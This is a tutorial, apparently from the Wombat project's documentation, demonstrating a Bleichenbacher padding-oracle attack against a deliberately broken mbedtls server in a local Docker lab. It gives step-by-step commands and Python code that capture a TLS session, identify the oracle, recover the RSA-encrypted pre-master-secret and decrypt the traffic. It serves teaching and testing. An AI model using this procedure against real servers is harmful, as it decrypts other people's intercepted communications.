# Wombat usage with TLS


## Context

One possible key exchange mechanism in TLS is RSA Encryption, which
consists for the client to encrypt a secret, the pre-master-secret,
using the server RSA public key.

This mechanism has been removed from TLS 1.3 since it does not provide
forward secrecy (as soon as the private key leaks from the server, it
is possible to decrypt all past sessions!

There is another reason it is not recommended to use this key exchange
mechanism: it relies on the PKCS#1 v1.5 encryption scheme, which might
be subject to so-called padding oracle. This is exactly the type of
attacks Wombat has been designed for!

So let us mount a vulnerable server and exploit it with Wombat. We
will capture a TLS session using RSA encryption as its key exchange
mechanism, and we will try to decrypt the ClientKeyExchange, the
message containing the pre-master-secret. Then, we will recover the
whole connection.


## Setup

For this tutorial, we will need two Docker images:

  * a container running a broken version of mbedtls (to be clear,
    mbedtls is __not__ vulnerable to the Bleichenbacher attack, but we
    introduced a bug in the server code to illustrate the attack with
    TLS. **Do not use our mbedtls container for production purpose!**
  * a container running wombat

For this, you must first build the Docker images using the following
command (working directory is assumed to be your working copy of the
wombat project):

    $ make -C docker


## Running a vulnerable server

First we create a network to connect our containers:

    docker network create wombat

Then we build and run the Docker container for mbedtls (assuming the
working directory is the root of your local copy of the wombat
repository):

    $ docker run --name vulnerable-tls-server -ti --rm -p 4433:4433 \
                 --network wombat mbedtls-oracle:explicit


## Collecting a target connection

From the host, we now run a target TLS connection we want to break
with wombat. First let us start a capture with tcpdump:

    $ sudo tcpdump -i lo port 4433 -w /tmp/capture.pcap

Then, we connect to the vulnerable server using openssl s_client (to
make the secret recoverable via the Bleichenbacher attack, we have to
force the RSA Encryption key exchange and to avoid TLS 1.3):

    $ (printf "GET /?secret=BIG-SECRET\r\n\r\n"; sleep 1) | \
      openssl s_client -connect localhost:4433 -cipher kRSA -no_tls1_3

We use the sleep command to ensure the socket is not closed before the
server can send application data. If all goes well, you should see a
200 status code and a simplistic HTML document stating the ciphersuite
used.

Do not forget to stop the capture at this point!

We can now extract the encrypted pre-master-secret we wish to
decrypt. To do this, we use `tshark` and record the value in the
CHALLENGE environment variable:

    $ CHALLENGE=$(tshark -r /tmp/capture.pcap \
                         -Tfields -e "tls.handshake.epms" \
                         tls.handshake.epms)

If you use an older version of `tshark`, you might need to adapt the
command line, since the protocol has been renamed, and the binary
representation was a little different.

    $ CHALLENGE=$(tshark -r /tmp/capture.pcap \
                         -Tfields -e "ssl.handshake.epms" \
                          ssl.handshake.epms | tr -d :)


## Using Wombat to identify an oracle

Let us launch wombat in a container, and plug it to the appropriate
network (we also inject the CHALLENGE environment variable in the
process):

    $ docker run --name wombat -ti --rm --network wombat \
                 -e CHALLENGE="$CHALLENGE" wombat

We can then try and identify the oracle type with the following script:

    (wombat)$ src/tls/wombat-tls.py -p 4433 vulnerable-tls-server
    vulnerable-tls-server['172.18.0.2']: Explicit FFT oracle found
     (true-signal={(False, 21, 20)}, false_signal={(False, 21, 51)})

You can also do this manually in a Python interpreter:

    >>> from tls.TLSStub import TLSStub
    >>> from wombat.OracleAssessment import identify_oracle
    >>> stub = TLSStub("vulnerable-tls-server", 4433)
    >>> identify_oracle(stub)
    ('FFT', {(False, 21, 20)}, {(False, 21, 51)})

The result means we can actually exploit this server since we can
distinguish cases where the padding is correct (an alert of type 20)
from cases where the padding is incorrect (an alert of type 51).


## Using Wombat to decrypt the target connection

Armed with our capture and the knowledge that an oracle exists, we can
try and play the full attack using wombat. Remember we put the
encrypted pre-master-secret in the CHALLENGE environment variable.

And now we can run the attack and wait some time. An example code is
available in doc/tuto-tls/tls-decryption-attack.py

    (wombat)$ python3 doc/tuto-tls/tls-decryption-attack.py \
              vulnerable-tls-server 4433 "$CHALLENGE"

If all goes well, you will get back the result, which should look like
(depending on your luck, this might take a long time):

    Oracle calls: 22353
    Message: b'03038a797bf190b2368273a3305337a039d9278c48ae4...'

You can also do this manually from a Python interpreter:

    >>> import codecs
    >>> from tls.TLSStub import TLSStub
    >>> from wombat.OracleAssessment import identify_oracle
    >>> from wombat.SimpleOracles import OracleFromStub
    >>> from wombat.DecryptionAttack import AttackAlgo, DecryptionAttack
    >>>
    >>> stub = TLSStub("vulnerable-tls-server", 4433)
    >>> _, true_signals, false_signals = identify_oracle(stub)
    >>>
    >>> c = codecs.decode(os.getenv('CHALLENGE'), "hex")
    >>> o = OracleFromStub(stub, true_signals, false_signals)
    >>> o.accept_unknown_behaviour()
    >>> attack = DecryptionAttack(o, algo=AttackAlgo.OptimisedAttack)
    >>> msg = attack.run(o.int_of_bytes(c))
    >>>
    >>> print("Oracle calls:", o.n_calls)
    Oracle calls: 22353
    >>> print("Message:", codecs.encode(msg, "hex"))
    Message: b'03038a797bf190b2368273a3305337a039d9278c48ae4...'


We can write this into a TLS keylog file, using a standard format:

    $ PRE_MASTER_SECRET=[the message obtained after the decryption attack]
    $ TRUNCATED_CHALLENGE="$(echo -n $CHALLENGE | head -c 16)"
    $ echo RSA "$TRUNCATED_CHALLENGE" "$PRE_MASTER_SECRET" > /tmp/secrets.txt

With a recent enough version of Wireshark (>2.6.10), you can inject
these secrets inside the capture, using `editcap`:

    $ editcap --inject-secrets tls,/tmp/secrets.txt \
              /tmp/capture.pcap /tmp/capture-secrets.pcapng

You can now open the pcapng file with Wireshark, you will now have
access to the decrypted version of TLS messages, either in a tab from
the Bytes view, or via the "Follow SSL stream" option.

If your version of Wireshark is too old, you can still inspect the
capture by setting the SSL Key Log file manually in the Preferences
dialog box (Protocols/SSL or Protocols/TLS). You should also be able
to do the same with `tshark`, for example with the following line:

    $ tshark -r /tmp/capture.pcap \
             -o ssl.keylog_file:/tmp/secrets.txt \
             -q -z "follow,ssl,ascii,0"

    [...]

    GET /?secret=BIG-SECRET

    [...]
    HTTP/1.0 200 OK
    Content-Type: text/html

    <h2>mbed TLS Test Server</h2>
    <p>Successful connection using: TLS-RSA-WITH-AES-256-GCM-SHA384</p>
